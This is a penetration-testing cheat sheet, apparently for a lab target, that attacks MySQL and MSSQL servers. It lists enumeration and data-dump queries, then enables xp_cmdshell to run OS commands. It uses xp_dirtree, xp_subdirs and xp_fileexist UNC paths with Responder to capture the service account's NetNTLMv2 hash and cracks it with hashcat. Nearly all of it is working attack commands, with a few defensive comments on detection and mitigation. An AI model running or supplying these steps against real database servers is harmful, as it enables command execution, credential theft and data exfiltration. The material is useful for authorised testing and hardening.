SQL
MySQL
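# Show only the active server settings: drop blank lines and full-line comments
# ("#" or ";"), but keep settings that carry a trailing "# ..." comment, which
# a plain `grep -v "#"` would silently hide.
grep -Ev '^[[:space:]]*(#|;|$)' /etc/mysql/mysql.conf.d/mysqld.cnf
# -p prompts for the password, keeping it out of shell history and the process list.
mysql -h 10.10.10.10 -u root -p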
-- List every database on the server.
SHOW DATABASES;
-- Report the server version.
SELECT VERSION();
-- Switch to one of the existing databases.
USE qu35t;
-- List the tables of the selected database.
SHOW TABLES;
-- Return every row and column of the chosen table.
SELECT * FROM users;
MSSQL
# Impacket MSSQL client; -windows-auth logs in with a Windows account instead of a SQL Server login.
mssqlclient.py qu35t@10.10.10.10 -windows-auth
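-- T-SQL comments start with "--"; a trailing "# ..." is not a comment and makes the batch fail.
-- The database name is bracketed because BACKUP is a T-SQL reserved keyword.

-- List databases
SELECT name FROM sys.databases;
-- List tables of a database
SELECT TABLE_NAME FROM [Backup].INFORMATION_SCHEMA.TABLES;
-- Extract data from a table
SELECT * FROM [Backup].dbo.Users;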
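Enable xp_cmdshell, which is disabled by default. Use either the client's built-in command or the equivalent T-SQL that follows it.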
-- mssqlclient.py built-in command; it runs the same sp_configure/RECONFIGURE sequence as the manual form.
enable_xp_cmdshell
-- Manual form. Changing these options requires the ALTER SETTINGS permission
-- (held by sysadmin and serveradmin), and each change is written to the SQL Server
-- error log, which gives defenders a place to detect it.
-- xp_cmdshell is an advanced option, so advanced options must be exposed first.
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Execute an operating-system command through xp_cmdshell.
-- The command runs as the SQL Server service account (or as the xp_cmdshell proxy
-- account for non-sysadmin callers); whoami shows which one.
exec xp_cmdshell "whoami"
Start Responder to listen for the SMB authentication attempt that the procedures below trigger.
# -I selects the network interface to listen on (tun0 here, presumably the VPN interface).
responder -I tun0
Use xp_dirtree.
-- A UNC path makes the SQL Server service account authenticate to that host over SMB,
-- exposing its NetNTLMv2 challenge-response. Mitigations: block outbound SMB (TCP 445)
-- from database servers and revoke EXECUTE on this procedure from public.
exec xp_dirtree "\\10.10.10.10\qu35t\"
Use xp_subdirs.
-- xp_subdirs also resolves the UNC path, so it causes the same outbound SMB
-- authentication as xp_dirtree and needs the same restrictions.
exec xp_subdirs "\\10.10.10.10\qu35t\"
Use xp_fileexist.
-- xp_fileexist also resolves the UNC path, so it causes the same outbound SMB
-- authentication as xp_dirtree and needs the same restrictions.
exec xp_fileexist "\\10.10.10.10\qu35t\"
# -a 0: wordlist attack; -m 5600: NetNTLMv2. A long random service-account
# password (e.g. a group managed service account) does not appear in such lists.
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt